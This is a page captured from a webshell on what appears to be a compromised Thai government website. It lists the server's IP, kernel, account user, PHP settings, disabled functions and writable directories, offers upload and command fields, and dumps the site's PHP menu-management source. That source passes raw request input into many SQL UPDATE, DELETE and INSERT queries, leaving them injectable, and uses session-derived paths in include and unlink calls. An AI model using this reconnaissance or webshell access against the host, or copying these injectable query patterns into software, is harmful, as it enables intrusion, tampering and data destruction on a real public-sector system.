403Webshell
Server IP : 119.59.102.212  /  Your IP : 18.117.197.188
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/link/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/link/manage_header.php
<?php
session_start();
include ("../../function_sql_query.php");
include ("../../function_form.php");
include ("../../function_import_request.php");
echo"<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>";
echo"<link href='coremain/ccs/style.css' rel='stylesheet' type='text/css'>";
echo "<title>จัดการเมนู</title>";
import_request_variables('pG', 'p_');
//#5.3#//if($p_oncheck!="")						{	     $oncheck=trim($p_oncheck);				}
$oncheck = isset($p_oncheck) ? $p_oncheck : '';
//#5.3#//if($p_id_top!="")							{	     $id_top=trim($p_id_top);						}
$id_top = isset($p_id_top) ? $p_id_top : '';
//#5.3#//if($p_id_subs!="")							{	     $id_subs=trim($p_id_subs);					}
$id_subs = isset($p_id_subs) ? $p_id_subs : '';
//#5.3#//if($p_namemenu!="")					{	     $namemenu=trim($p_namemenu);		}
$namemenu = isset($p_namemenu) ? $p_namemenu : '';
//#5.3#//if($p_dele!="")								{	     $dele=trim($p_dele);								}
$dele = isset($p_dele) ? $p_dele : '';
//#5.3#//if($p_web_name!="")					{	     $web_name=trim($p_web_name);		}
$web_name = $_SESSION['web_name'];// isset($p_web_name) ? $p_web_name : '';
//#5.3#//if($p_module!="")							{	     $module=trim($p_module);					}
$module = isset($p_module) ? $p_module : '';
//#5.3#//if($p_id_type!="")							{	     $id_type=trim($p_id_type);						}
$id_type = isset($p_id_type) ? $p_id_type : '';
//#5.3#//if($p_check_up!="")						{	     $check_up=trim($p_check_up);			}
$check_up = isset($p_check_up) ? $p_check_up : '';
//#5.3#//if($p_id_show!="")						{	     $id_show=trim($p_id_show);					}
$id_show = isset($p_id_show) ? $p_id_show : '';
//#5.3#//if($p_id_order!="")						{	     $id_order=trim($p_id_order);					}
$id_order = isset($p_id_order) ? $p_id_order : '';
//#5.3#//if($p_id_del!="")							{	     $id_del=trim($p_id_del);							}
$id_del = isset($p_id_del) ? $p_id_del : '';
//#5.3#//if($p_name!="")								{	     $name=trim($p_name);							}
$name = isset($p_name) ? $p_name : '';
//#5.3#//if($p_url!="")									{	     $url=trim($p_url);										}
$url = isset($p_url) ? $p_url : '';
//#5.3#//if($p_change_theme!="")			{     $change_theme=trim($p_change_theme);		}
$change_theme = isset($p_change_theme) ? $p_change_theme : '';
//#5.3#//if($p_module_type!="")				{     $module_type=trim($p_module_type);				}
$module_type = isset($p_module_type) ? $p_module_type : '';

//#5.3#//if($p_themes_!="")				{     $themes_=trim($p_themes_);			$_SESSION[themes_]=$themes_;	}
  //$_SESSION['themes_'] = isset($p_themes_) ? $p_themes_ : '';

if ($_SESSION['web_name'] == "")
  $_SESSION['web_name'] = $web_name;
include("../../../$_SESSION[web_name]/connect.php");
if ($oncheck == 1) {
  ?>
  <script language="JavaScript">
    document.getElementById("myModal").style.display = "none";
//    window.opener.location.href = '../../../index.php';
//    window.close();
  </script>
  <?php
}


  $sql = "UPDATE `cms_module` SET `name` = 'ลงข้อมูล ITA' WHERE `cms_module`.`mod_id` = '2'";
  $result = mysql_query($sql) or die(mysql_error());


// ##########แก้ไขรูปเมนูหลัก ##########
if ($change_theme != "") {
  $sql = "UPDATE `cms_menu_top` SET  name='$change_theme'  WHERE `id_top` ='$id_top'";
  $result = mysql_query($sql) or die(mysql_error());
  $change_theme = "";
}

// ############################################## เมนูย่อย
// แก้ไขเมนูย่อย
if ($check_up == 1 && $url == "") {
  $sql = "UPDATE `cms_menu_sub` SET  name='$namemenu'  WHERE `id_sub` ='$id_subs'";
  $result = mysql_query($sql) or die(mysql_error());
}
// แก้ไขเมนูย่อย
if ($check_up == 1 && $url != "") {
  $sql = "UPDATE `cms_menu_sub` SET  name='$namemenu',url='$url'  WHERE `id_sub` ='$id_subs'";
  $result = mysql_query($sql) or die(mysql_error());
}

// ซ่อน - แสดง ข้อมูล
if ($id_subs != "" && $id_show == 1) {
  $sql = "UPDATE `cms_menu_sub` SET `status` = '0'  WHERE id_sub ='$id_subs'";
  $result = mysql_query($sql) or die(mysql_error());
}if ($id_subs != "" && $id_show == 2) {
  $sql = "UPDATE `cms_menu_sub` SET `status` = '1'  WHERE id_sub ='$id_subs'";
  $result = mysql_query($sql) or die(mysql_error());
}
//  เลื่อนตำแหน่งเมนู ขึ้น-ลง 
if ($id_subs != "" && $id_order != "") {
  $sql = "SELECT * FROM `cms_menu_sub` WHERE  id_sub='$id_subs'";
  $re = mysql_query($sql) or die(mysql_error());
  $data = mysql_fetch_array($re);
  if ($id_order == 1) {
    $up = $data['position'] - 1;
  }
  if ($id_order == 2) {
    $up = $data['position'] + 1;
  }
  // แก้ไขเลื่อนขึ้น
  $sql = "UPDATE `cms_menu_sub` SET position='$up' WHERE id_sub ='$data[id_sub]'";
  $re = mysql_query($sql) or die(mysql_error());
  // แก้ไขเลื่อนลง
  $sql = "UPDATE `cms_menu_sub` SET position='$data[position]'  WHERE id_sub!='$data[id_sub]' && position='$up'";
  $re = mysql_query($sql) or die(mysql_error());
}
// ลบ Module link_page
if ($id_del != "") {
  $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
  $re = mysql_query($sql) or die(mysql_error());
}
// ลบข้อมูลทุกอย่างใน โมดูล
if ($id_del != "" && $module != "") {
  if ($module == "blog") {
    $sql = "select * from cms_blog WHERE id_sub='$id_del'";
    $result = mysql_query($sql);
    $datadel = mysql_fetch_array($result);
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$datadel[file1]") && $datadel['file1'] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$datadel[file1]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$datadel[file2]") && $datadel['file2'] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$datadel[file2]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$datadel[file3]") && $datadel['file3'] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$datadel[file3]");
    }

    $sql = "DELETE FROM `cms_blog`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());

    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());
  } else if ($module == "buject") {
    $sql = "DELETE FROM `cms_buject`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());

    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());
  } else if ($module == "news_page") {
    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());

    $sql1 = "select pic1,pic2,pic3,pic4,files from cms_news_page where id_sub='$id_del'";
    $result1 = mysql_query($sql1);
    $data1 = mysql_fetch_row($result1);
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[0]") && $data1[0] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[0]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[1]") && $data1[1] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[1]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[2]") && $data1[2] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[2]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[3]") && $data1[3] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[3]");
    }
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[4]") && $data1[4] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[4]");
    }
    $sql = "delete from cms_news_page where id_sub='$id_del'";
    $result = mysql_query($sql) or die(mysql_error());
  } else if ($module == "load") {
    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());

    $sql1 = "select files from cms_file where id_sub='$id_del'";
    $result1 = mysql_query($sql1);
    $data1 = mysql_fetch_row($result1);
    if (file_exists("../../../$_SESSION[web_name]/mainfile/$data1[0]") && $data1[0] != "") {
      unlink("../../../$_SESSION[web_name]/mainfile/$data1[0]");
    }
    $sql = "delete from cms_file where id_sub='$id_del'";
    $result = mysql_query($sql) or die(mysql_error());
  } else if ($module == "faq") {
    $sql = "DELETE FROM `cms_faq`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());

    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());
  } else if ($module == "director_chart") {
    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());


    $sql = "SELECT * FROM cms_director_chart WHERE id_sub='$id_del'";
    $re = mysql_query($sql);
    while ($data = mysql_fetch_array($re)) {
      $sql = "SELECT * FROM cms_director_chart_profile WHERE id_chart=$data[id_chart]";
      $re = mysql_query($sql);
      while ($data = mysql_fetch_array($re)) {
        if (file_exists("../../../$_SESSION[web_name]/module_chart/$id_del/$data[picture]") && $data['picture'] != "") {
          unlink("../../../$_SESSION[web_name]/module_chart/$id_del/$data[picture]");
        }
        $sql = "delete from cms_director_chart_profile where id_chart='$data[id_chart]'";
        $result = mysql_query($sql) or die(mysql_error());
      }
    }
    $sql = "delete from cms_director_chart where id_sub='$id_del'";
    $result = mysql_query($sql) or die(mysql_error());
    //rmdir("../../../$_SESSION[web_name]/module_chart/$id_del");	
  } else if ($module == "muban_chart") {
    $sql = "DELETE FROM `cms_menu_sub`  WHERE id_sub='$id_del'";
    $re = mysql_query($sql) or die(mysql_error());


    $sql = "SELECT * FROM cms_muban_chart WHERE id_sub='$id_del'";
    $re = mysql_query($sql);
    while ($data = mysql_fetch_array($re)) {
      $sql = "SELECT * FROM cms_muban_chart_profile WHERE id_chart=$data[id_chart]";
      $re = mysql_query($sql);
      while ($data = mysql_fetch_array($re)) {
        if (file_exists("../../../$_SESSION[web_name]/muban_chart/$id_del/$data[picture]") && $data[picture] != "") {
          unlink("../../../$_SESSION[web_name]/muban_chart/$id_del/$data[picture]");
        }
        $sql = "delete from cms_muban_chart_profile where id_chart='$data[id_chart]'";
        $result = mysql_query($sql) or die(mysql_error());
      }
    }
    $sql = "delete from cms_muban_chart where id_sub='$id_del'";
    $result = mysql_query($sql) or die(mysql_error());

    $sql = "delete from cms_muban_profile where id='$id_del'";
    $result = mysql_query($sql) or die(mysql_error());
  } else if ($module == "link") { // Level 1
    if ($_SESSION['id_del'] == "")
      $_SESSION['id_del'] = $id_del;
    $sql = "SELECT * FROM cms_link_group WHERE id_sub='$_SESSION[id_del]'";
    $re = mysql_query($sql);
    $ch_1 = mysql_num_rows($re);
    if ($ch_1 >= 1) {
      while ($data = mysql_fetch_array($re)) {
        $sql = "DELETE FROM cms_link_group WHERE id_group='$data[id_group]'";
        $result = mysql_query($sql);

        // DELETE cms_link_group
        $sqla = "select id_link,picture from cms_link where id_group='$data[id_group]' order by id_link";
        $resulta = mysql_query($sqla);
        $ch_2 = mysql_num_rows($resulta);
        if ($ch_2 >= 1) {
          while ($dataa = mysql_fetch_array($resulta)) {
            if (file_exists("../../../$_SESSION[web_name]/mainfile/$dataa[picture]") && $dataa[picture] != "") {
              unlink("../../../$_SESSION[web_name]/mainfile/$dataa[picture]");
            }
            $sql = "DELETE FROM cms_link WHERE id_link=$dataa[id_link]";
            $result = mysql_query($sql);
          }
        }
      }
    }
    $sql = "DELETE FROM cms_menu_sub WHERE id_sub='$_SESSION[id_del]'";
    $result = mysql_query($sql);
    session_unregister("id_del");
  }// End Level 1
}


// ######################################## เพิ่มเมนูย่อย ในโมดูลประเภทต่าง ๆ 
if ($module != "" && $namemenu != "" && $check_up != 1) {
// หาค่า id_sub Max ของ  cms_menu_sub
  $maxid = "select max(id_sub+1) from `cms_menu_sub`";
  $resultmaxid = mysql_query($maxid);
  $datamaxid = mysql_fetch_row($resultmaxid);
  if ($datamaxid[0] == "") {
    $datamaxid[0] = 1;
  }

// หาค่า position Max ของ id_top นั้น ๆ ใน cms_menu_sub
  $maxposition = "select max(position+1) from `cms_menu_sub` WHERE id_top='$id_top'";
  $resultmaxposition = mysql_query($maxposition);
  $datamaxposition = mysql_fetch_row($resultmaxposition);
  if ($datamaxposition[0] == "") {
    $datamaxposition[0] = 1;
  }

  $url = "index.php?mod=$module&path=$module&id_sub=$datamaxid[0]";

// Blog
  if ($module == "blog") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql, TRUE);
    // Insert cms_blog
    $sql = "INSERT INTO `cms_blog` (`id_blog`,`id_sub`,`fulltexts`) VALUES ('','$datamaxid[0]','')";
    $result = query($sql, TRUE);
  }
// News
  else if ($module == "news_page") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
    // Insert_clms_news_page
    $sql = "INSERT INTO `cms_news_page` VALUES ('', '$datamaxid[0]', '$id_type', '', '', '0000-00-00', '0000-00-00', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '1', 0, 0)";
    $result = query($sql);
  }
// Link
  else if ($module == "link") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
    // Insert_clms_news_page
    $sql = "INSERT INTO `cms_link_group` (`id_group` ,`id_sub` ,`name_group` ,`status`) VALUES (NULL , '$datamaxid[0]', '$namemenu', '1')";
    $result = query($sql);
  }
// Questions - Answers
  else if ($module == "faq") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }
// Director chart
  else if ($module == "director_chart") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }
// หมู่บ้านในเขต อบต.
  else if ($module == "muban_chart") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }

// งบประมาณ
  else if ($module == "buject") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
    // Insert cms_buject
    $sql = "INSERT INTO `cms_buject` (`id_buject`,`id_sub`,`fulltexts`) VALUES ('','$datamaxid[0]','')";
    $result = query($sql, TRUE);
  }
// หมู่บ้านในเขต อบต.
  else if ($module == "link_text") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }
// ลิงค์ไปยังหน้าอื่น ๆ
  else if ($module == "link_page") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '2','$namemenu', '', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }
// โหลด
  else if ($module == "load") {
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    $result = query($sql);
  }
// แบบสอบถาม
  else if($module == 'question'){
    // Insert cms_menu_sub
    $sql = "INSERT INTO `cms_menu_sub` (`id_sub` ,`id_top`,`id_type` ,`name` ,`url` ,`position` ,`status`) VALUES ('$datamaxid[0]', '$id_top', '$id_type','$namemenu', '$url', '$datamaxposition[0]', '1')";
    query($sql);
    
    // insert cms_question
    $_question = select_max_query0('id_question', 'cms_question');
    $question_id = $_question[0] == '' ? 1 : $_question[0];
    $ins_topic = "INSERT INTO cms_question (id_question, topic, id_sub) VALUES ('$question_id', '$namemenu', '$datamaxid[0]')";
    mysql_query($ins_topic);
  }
}


// ############################################# เมนูหลัก
// แก้ไขเมนูหลัก
if ($id_top != "" && $check_up == '2') {
  $sql = "UPDATE `cms_menu_top` SET  name='$name'  WHERE `id_top` ='$id_top'";
  $result = query($sql);
}

#=== get theme ===#
$sel_thm = "SELECT * FROM cms_main_themes WHERE id = '$_SESSION[themes_]'";
$que_thm = mysql_query($sel_thm);
$datatm = mysql_fetch_assoc($que_thm);

// ####################### แก้ไขชื่อเมนูหลัก #############################
?>
<fieldset>
  <!--<legend>จัดการเมนู</legend>-->
  <br/>
  <table width='95%' border='0' align='center' cellpadding='1' cellspacing='1'>
    <tr bgcolor='<?php // $datatm['color'] ?>'><td colspan='2' align=left><b>แก้ไขชื่อเมนูหลัก</b></td></tr>
    <tr height=10><td colspan='2' align=center></td></tr>
<?php
  $sql = "SELECT * FROM cms_menu_top WHERE id_top='$id_top'";
  $result = mysql_query($sql);
  $data = mysql_fetch_array($result);
  
    $menu_name = strpos($data['name'], '.gif') > -1 || strpos($data['name'], '.jpg') > -1 || strpos($data['name'], '.png') > -1 ? '' : $data['name'];
    $menu_bg = $menu_name == '' ? $data['name'] : 'menu_bg.jpg';
?>
    <tr height="40">
      <td width="50%" align="right" style="background: url(coremain/images/menu/<?= $_SESSION['themes_'] ?>/1/<?= $menu_bg ?>) no-repeat; width: 180px; float: right;" class="<?= $_SESSION['themes_'] ?>"><?= $menu_name ?></td>
      <td width="50%" align='left'>&nbsp; <img src='coremain/images/edit.gif'>&nbsp;<a href="javascript:void(0);" class="change_menu" id="<?= $data['name'] ?>">เปลี่ยนเมนู</a></td>
    </tr>
    <tr height=10><td colspan='2' align=center></td></tr>
  </table>

<?php
// ############################ เพิ่มเมนูย่อย #########################
//if ($id_top != "0" && $id_top != "1" && $id_top != "2" && $id_top != "3" && $id_top != "4" && $id_top != "5" && $module_type != "boss_message" && $module_type != "sponser" && $module_type != "picture" && $module_type != 'web_link' && $module_type != 'code') {
if($module_type == 'link'){
?>
<!--  // ############################# แสดงเมนูย่อย #############################-->
<form id="fm_manage_header">
  <table width='95%' border='0' align='center' cellpadding='1' cellspacing='1' bgcolor='eeeeee'>
    <tr><td colspan='2' align=left><b>แสดงเมนูย่อย</b></td></tr>
    <tr>
      <td width='65%' align=center bgcolor='dddddd'><b>ชื่อเมนู</b></td>
      <td width='15%' align=center bgcolor='dddddd'><b>จัดการ</b></td>
    </tr>
<?php
  $sql = "SELECT * FROM `cms_menu_sub` WHERE id_top='$data[id_top]' order by position asc";
  $result = mysql_query($sql);
  $count_l = 1;
  while ($data = mysql_fetch_array($result)) {
    $id_sub = $data['id_sub'];
?>
    <!--<FORM METHOD=POST ACTION='manage_header.php?id_top=<?= $id_top ?>&id_subs=<?= $data['id_sub'] ?>&id_top=<?= $id_top ?>'>-->
      <tr>
      <!--# ประเภท-->
<?php
  $pieces = explode("?", $data['url']);
  $pieces = isset($pieces[1]) ? explode("&", $pieces[1]) : $pieces;
  $pieces = isset($pieces[1]) ? explode("=", $pieces[1]) : $pieces;

  //echo $module;
  if($module != ''){
    $mod_name = select_query_data("name", "cms_module", "e_name", $module);
  }
?>
      <!--# ชื่อ-->
      <td align=center>
      <?php if ($data['id_type'] == '2') { ?>
        &nbsp;URL : <INPUT TYPE='text' id="url_<?= $id_sub ?>" NAME='url' value='<?= $data['url'] ?>' >
        &nbsp;เมนู : <INPUT TYPE='text' id="namemenu_<?= $id_sub ?>" NAME='namemenu' value='<?= $data['name'] ?>'>
      <?php }if ($data['id_type'] == '1') { ?>
        &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; เมนู : 
        <INPUT TYPE='text' id="namemenu_<?= $id_sub ?>" NAME='namemenu' value='<?= $data['name'] ?>'>
      <?php } ?>
        <!--<INPUT TYPE='submit' value='แก้ไขข้อมูล' onmouseover=this.style.cursor='hand'>-->
        <button type="button" class="ui-button ui-widget ui-corner-all btn_change_namemenu" id="<?= $id_sub ?>">แก้ไขข้อมูล</button>
        <INPUT TYPE='hidden' id="check_up_<?= $id_sub ?>" name='check_up' value='1'>
      </td>
      <!--# จัดการ-->
      <td align=center>
<?php
  $sql_num = "SELECT count(*) FROM `cms_menu_sub` WHERE id_top='$data[id_top]' order by id_sub asc";
  $re_num = mysql_query($sql_num);
  $data_num = mysql_fetch_array($re_num);
      # Up 
      if ($count_l > 1) { ?>
        <!--<a href='manage_header.php?id_subs=<?= $id_sub ?>&id_order=1&id_top=<?= $id_top ?>'><img src='coremain/images/up.gif' border='0' title='เลื่อนขึ้น'></a>--> 
        <a href="javascript:void(0);" id="<?= $id_sub ?>" class="bt_arrow_up"><img src="coremain/images/up.gif" border="0" title="เลื่อนขึ้น" /></a>
      <?php }else{ ?>
        &nbsp;&nbsp; &nbsp;&nbsp;
      <?php }
      # Down
      if ($count_l < $data_num[0]) { ?>
        <!--<a href='manage_header.php?id_subs=<?= $id_sub ?>&id_order=2&id_top=<?= $id_top ?>'><img src='coremain/images/down.gif' border='0' title='เลื่อนลง'></a>--> 
        <a href="javascript:void(0);" id="<?= $id_sub ?>" class="bt_arrow_down"><img src="coremain/images/down.gif" border="0" title="เลื่อนลง" /></a>
      <?php } else { ?>
        &nbsp;&nbsp; &nbsp;&nbsp;
      <?php }
      # show -hide
      if ($data['status'] == "1"){ ?>
        <!--<a href='manage_header.php?id_subs=<?= $id_sub ?>&id_show=1&id_top=<?= $id_top ?>' title='ซ่อนข้อมูล'><img src='coremain/images/show.gif' border='0'></a>--> 
        <a href="javascript:void(0);" id="<?= $id_sub ?>" class="bt_show"><img src="coremain/images/show.gif" border="0" title="ซ่อนข้อมูล" /></a>
      <?php }else{ ?>
        <!--<a href='manage_header.php?id_subs=<?= $id_sub ?>&id_show=2&id_top=<?= $id_top ?>' title='แสดงข้อมูล'><img src='coremain/images/hide.gif' border='0'></a>-->
        <a href="javascript:void(0);" id="<?= $id_sub ?>" class="bt_hide"><img src="coremain/images/hide.gif" border="0" title="แสดงข้อมูล" /></a>
      <?php }

      // ################ Del ##################
      if ($id_top != "0" && $id_top != "1" && $id_top != "4") {
        $_idsub = isset($pieces[1]) ? $id_sub.'#+#'.$pieces[1] : $id_sub;
      ?>
        <!--<a href='manage_header.php?id_del=<?= $id_sub ?>&id_top=<?= $id_top ?>&module=<?= $pieces[1] ?>'><img src='coremain/images/del1.gif' border='0' title='ลบข้อมูล'  onclick='return goURLdel();'></a><br/>-->
        <a href="javascript:void(0);" id="<?= $_idsub ?>" class="bt_delete"><img src="coremain/images/del1.gif" border="0" title="ลบข้อมูล" /></a>
      <?php } ?>
      </td>
    </tr>
<?php $count_l++; ?>
<?php } ?>
  </table>
</FORM>

<table width='95%' border='0' align='center' cellpadding='1' cellspacing='1'>
  <tr bgcolor='<?= $datatm['color'] ?>'><td colspan='2' align=left><b>เพิ่มเมนูย่อย</b></td></tr>
  <tr height=10><td colspan='2' align=center></td></tr>
    <!--<FORM METHOD=POST ACTION='manage_header.php?id_top=<?= $id_top ?>' name='add' onSubmit='return checkadd()'>-->
      <tr>
        <td width='50%' align=center><INPUT TYPE='text' id="namemenu_new" NAME='namemenu' value='' size='20'>&nbsp;
      <?php selected_field_sql("module", "SELECT * FROM cms_module WHERE allow='3'", "e_name", "name", $module); ?>
        </td>
        <td width='20%'>
          <!--<INPUT TYPE='submit' value='เพิ่มเมนูย่อย' onmouseover=this.style.cursor='hand'>-->
          <button type="button" class="ui-button ui-widget ui-corner-all btn_add_newmenu">เพิ่มเมนูย่อย</button>
          <INPUT TYPE='hidden' name='id_top' value='<?= $id_top ?>'>
          <INPUT TYPE='hidden' name='id_type' value='1'>
        </td>
      </tr>
      <tr height=10><td colspan='2' align=center></td></tr>
    <!--</FORM>-->
</table>
<?php
}

//################# ปิดหน้าต่าง ######################## ?>
<!--<FORM METHOD=POST ACTION='manage_header.php?oncheck=1'>
  <center><INPUT TYPE='submit' value='ปิดหน้านี้' class="close" onmouseover=this.style.cursor='hand'></center>
</FORM>-->
<!--<center>
  <br/><span class="close-center" onclick="windowClose();">&times; ปิดหน้านี้</span>
</center>-->

</fieldset>

<script language="javascript">
  function checkadd() {
    if (document.add.namemenu.value == "") {
      alert("กรุณากรอก ชื่อเมนูย่อย!");
      document.add.namemenu.focus();
      return false;
    }
    else if (document.add.module.value == "0") {
      alert("กรุณาเลือกประเภทโมดูล!");
      document.add.module.focus();
      return false;
    }
    else
      return true;
  }
  
  function goURLdel() {
    var blnLink
    blnLink = confirm("Click OK เพื่อยืนยันการลบข้อมูล?")
    if (!blnLink) {
      return false;
    }
    return true;
  }

  $('fieldset').focus();
  
  var arrData = [
    { name: 'id_top', value: '<?= $id_top ?>' },
    { name: 'module_type', value: '<?= $module_type ?>' }
  ];
  $('.change_menu').click(function(){
    var value = $(this).attr('id');
    arrData.push({ name: 'name_menu', value: value });
    
    $('#dialog-popup').dialog({ dialogClass: 'no-close' });
    $.ajax({
      type: 'post',
      url: 'coremain/module/link/change_menu.php',
      data: arrData,
      success: function(result){
        $('#dialog-popup').html(result);
      }
    });
  });
  
  $('.btn_add_newmenu')
          .button()
          .click(function(){
            arrData.push({ name: 'namemenu', value: $('#namemenu_new').val() });
            arrData.push({ name: 'module', value: $('select[name=module]').val() });
            arrData.push({ name: 'id_type', value: 1 });
            manage_header(arrData);
          });
  
  $('.btn_change_namemenu')
          .button()
          .click(function(){
            var value = $(this).attr('id');
            var url = $('#url_'+value).val();
            arrData.push({ name: 'id_subs', value: value });
            arrData.push({ name: 'namemenu', value: $('#namemenu_'+value).val() });
            arrData.push({ name: 'check_up', value: $('#check_up_'+value).val() });
            if(url !== undefined){
              arrData.push({ name: 'url', value: $('#url_'+value).val() });
            }
            manage_header(arrData);
          });
  
  $('.bt_arrow_up').click(function(){
    var value = $(this).attr('id');
    arrData.push({ name: 'id_subs', value: value });
    arrData.push({ name: 'id_order', value: 1 });
    manage_header(arrData);
  });
  $('.bt_arrow_down').click(function(){
    var value = $(this).attr('id');
    arrData.push({ name: 'id_subs', value: value });
    arrData.push({ name: 'id_order', value: 2 });
    manage_header(arrData);
  });
  
  $('.bt_show').click(function(){
    var value = $(this).attr('id');
    arrData.push({ name: 'id_subs', value: value });
    arrData.push({ name: 'id_show', value: 1 });
    manage_header(arrData);
  });
  $('.bt_hide').click(function(){
    var value = $(this).attr('id');
    arrData.push({ name: 'id_subs', value: value });
    arrData.push({ name: 'id_show', value: 2 });
    manage_header(arrData);
  });
  
  $('.bt_delete').click(function(){
    var arr = $(this).attr('id').split('#+#');
    arrData.push({ name: 'id_del', value: arr[0] });
    arrData.push({ name: 'module', value: arr[1] });
    manage_header(arrData);
  });
  
  function manage_header(arrData){
    $.ajax({
      type: 'post',
      url: 'coremain/module/link/manage_header.php',
      data: arrData,
      success: function(result){
        $('#dialog-popup').html(result);
      }
    });
  }
  
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit